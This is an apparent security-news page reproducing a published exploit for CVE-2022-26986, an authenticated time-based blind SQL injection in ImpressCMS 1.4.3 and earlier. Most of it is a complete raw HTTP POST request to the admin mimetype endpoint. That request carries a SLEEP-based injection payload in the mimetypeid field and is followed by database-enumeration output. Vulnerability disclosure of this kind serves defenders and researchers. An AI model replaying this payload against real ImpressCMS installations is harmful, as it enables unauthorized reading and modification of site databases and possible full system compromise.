Security
Headlines
HeadlinesLatestCVEs

Headline

CVE-2022-26986: 0days/Exploit.txt at main · sartlabs/0days

SQL Injection in ImpressCMS 1.4.3 and earlier allows remote attackers to inject into the code in unintended way, this allows an attacker to read and modify the sensitive information from the database used by the application. If misconfigured, an attacker can even upload a malicious web shell to compromise the entire system.

CVE
#sql#web#windows#linux#apache#git#php#auth#firefox

Permalink

Cannot retrieve contributors at this time

# Exploit Title: Authenticated Sql Injection in ImpressCMS v1.4.3

# SQL Injection in ImpressCMS v1.4.3 and earlier allows remote attackers to inject into the code in unintended way, this allows an attacker to read and modify the sensitive information from the database used by the application. If misconfigured, an attacker can even upload a malicious web shell to compromise the entire system.

# Exploit Author: Sarang Tumne @CyberInsane (Twitter: @thecyberinsane) #HTB profile: https://www.hackthebox.com/home/users/profile/2718

# Date: 7th March 2022

# CVE ID: CVE-2022-26986

# Confirmed on release 1.4.3

# Vendor: https://www.impresscms.org/ Download is available at: https://github.com/ImpressCMS/impresscms/releases/tag/v1.4.3

###############################################

#Step1- Login with Admin Credentials

#Step2- Vulnerable Parameter to SQLi: mimetypeid (POST request):

POST /ImpressCMS/htdocs/modules/system/admin.php?fct=mimetype&op=mod&mimetypeid=1 HTTP/1.1

Host: 192.168.56.117

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:97.0) Gecko/20100101 Firefox/97.0

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8

Accept-Language: en-US,en;q=0.5

Accept-Encoding: gzip, deflate

Content-Type: multipart/form-data; boundary=---------------------------40629177308912268471540748701

Content-Length: 1011

Origin: http://192.168.56.117

Connection: close

Referer: http://192.168.56.117/ImpressCMS/htdocs/modules/system/admin.php?fct=mimetype&op=mod&mimetypeid=1

Cookie: tbl_SystemMimetype_sortsel=mimetypeid; tbl_limitsel=15; tbl_SystemMimetype_filtersel=default; ICMSSESSION=7c9f7a65572d2aa40f66a0d468bb20e3

Upgrade-Insecure-Requests: 1

-----------------------------40629177308912268471540748701

Content-Disposition: form-data; name="mimetypeid"

1 AND (SELECT 3583 FROM (SELECT(SLEEP(5)))XdxE)

-----------------------------40629177308912268471540748701

Content-Disposition: form-data; name="extension"

bin

-----------------------------40629177308912268471540748701

Content-Disposition: form-data; name="types"

application/octet-stream

-----------------------------40629177308912268471540748701

Content-Disposition: form-data; name="name"

Binary File/Linux Executable

-----------------------------40629177308912268471540748701

Content-Disposition: form-data; name="icms_page_before_form"

http://192.168.56.117/ImpressCMS/htdocs/modules/system/admin.php?fct=mimetype

-----------------------------40629177308912268471540748701

Content-Disposition: form-data; name="op"

addmimetype

-----------------------------40629177308912268471540748701

Content-Disposition: form-data; name="modify_button"

Submit

-----------------------------40629177308912268471540748701–

Vulnerable Payload:

1 AND (SELECT 3583 FROM (SELECT(SLEEP(5)))XdxE) //time-based blind (query SLEEP)

Output:

web application technology: Apache 2.4.52, PHP 7.4.27

back-end DBMS: MySQL >= 5.0.12 (MariaDB fork)

available databases [6]:

[*] impresscms

[*] information_schema

[*] mysql

[*] performance_schema

[*] phpmyadmin

[*] test

CVE: Latest News

CVE-2023-50976: Transactions API Authorization by oleiman · Pull Request #14969 · redpanda-data/redpanda
CVE-2023-6905
CVE-2023-6903
CVE-2023-6904
CVE-2023-3907